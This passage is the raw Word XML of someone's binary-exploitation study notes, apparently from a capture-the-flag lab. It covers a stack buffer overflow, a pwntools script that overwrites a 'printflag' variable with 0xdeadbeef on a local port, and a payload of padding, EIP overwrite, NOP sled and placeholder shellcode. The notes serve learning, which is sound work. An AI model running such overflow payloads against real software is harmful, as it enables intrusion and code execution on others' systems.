      <w:r>
        <w:t xml:space="preserve">payload = padding + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B4BCD90" w14:textId="77777777" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682C8EF6" w14:textId="57058009" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DAE04" w14:textId="1771B408" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run file and save output to a txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001462E3" w14:textId="0FF7334E" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python &lt;file.py&gt; &gt; attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977EAAA" w14:textId="64D0D346" w:rsidR="007E2D48" w:rsidRDefault="007E2D48" w:rsidP="007E2D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use this output file as input for targeted program to overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4616B2" w14:textId="5306C526" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>victim_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; &lt; attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C61779" w14:textId="052649C4" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D5997" w14:textId="38650CBC" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidRPr="00FE632C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.geeksforgeeks.org/tcp-server-client-implementation-in-c/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B8A2570" w14:textId="77777777" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve">The struct at the beginning of the function, called targets, has two variables: buff and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>printflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77399FDA" w14:textId="77777777" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve">The buff is a char array of size MAX (MAX was defined to 32), and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>printflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve"> is a volatile int. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937967F" w14:textId="77777777" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve">These variables will be right next to each other in the stack, so if we manage to overflow the buff variable, then we can edit the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>printflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29554130" w14:textId="349535B8" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve"> If you see further down in the code, if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>printflag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3EB5">
        <w:t xml:space="preserve"> variable is equal to 0xdeadbeef (in hex) then it will send the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A946E" w14:textId="04A1FCEC" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Networking to the Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55708ED3" w14:textId="7CB236A7" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3EB5">
        <w:t>We will need to write a script to connect to the port, receive the data, and send our payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE79702" w14:textId="7B51945C" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B58563" w14:textId="686987A9" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">connect = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>‘127.0.0.1’, 1337)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338652AF" w14:textId="337BAB51" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect.recvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(18))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A680C88" w14:textId="73C1FD3C" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload = “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A”*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CE38D" w14:textId="1FAF6459" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload += p32(0xdeadbeef)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A964A1" w14:textId="452FFC46" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect.sned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEDED75" w14:textId="5A96DB70" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect.recvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(34))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D4D06" w14:textId="095FFE94" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42B6322E" w14:textId="1F3ED0E7" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rooting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0EB5C" w14:textId="16F660F6" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Shellcode in Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F27472" w14:textId="76B3ACC9" w:rsidR="008B3EB5" w:rsidRDefault="008B3EB5" w:rsidP="008B3EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">writing instructions inside code and using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F04400">
        <w:t xml:space="preserve"> to point to instruction set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F89ED1" w14:textId="63010BA9" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">top of stack is pointed to by SP (stack pointer) or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in 32-bit machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2950E0" w14:textId="222AC516" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>want to jump to middle of stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7A91E" w14:textId="7A3D313E" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">achieve this by creating an offset to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> location (exact offset is determined by trial and error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2244" w14:textId="77777777" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18588391" w14:textId="77777777" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BC04A1" w14:textId="77777777" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>padding = cyclic(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyclic_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('answer_to_question_4'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A5BBF" w14:textId="77777777" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18972285" w14:textId="27EE9BF2" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = p32(0xffffd510+200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E150F5" w14:textId="7E9D7D5A" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use NOPs to create a large area to point to for shellcode beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEDD0E" w14:textId="277008B0" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NOP slide/sled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A059B" w14:textId="7EDAA425" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exact size is determined by trial and error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0650F7" w14:textId="77777777" w:rsidR="00F04400" w:rsidRPr="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F04400">
        <w:t>nop_slide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F04400">
        <w:t xml:space="preserve"> = "\x90"*1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D81FA5" w14:textId="7E467909" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inject breakpoint at end of NOP slide to ensure slide works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E46D4" w14:textId="58425D1F" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F04400">
        <w:t>shellcode = "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F04400">
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F04400">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB50A6" w14:textId="255161BB" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F07A5" w14:textId="5406F7E3" w:rsidR="00F04400" w:rsidRDefault="00F04400" w:rsidP="00F04400">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F04400">
        <w:t xml:space="preserve">payload = padding + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F04400">
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F04400">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F04400">
        <w:t>nop_slide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F04400">
        <w:t xml:space="preserve"> + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A609915" w14:textId="66C70021" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>direct output of file to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5CD09F" w14:textId="3C88832E" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwntools</w:t>
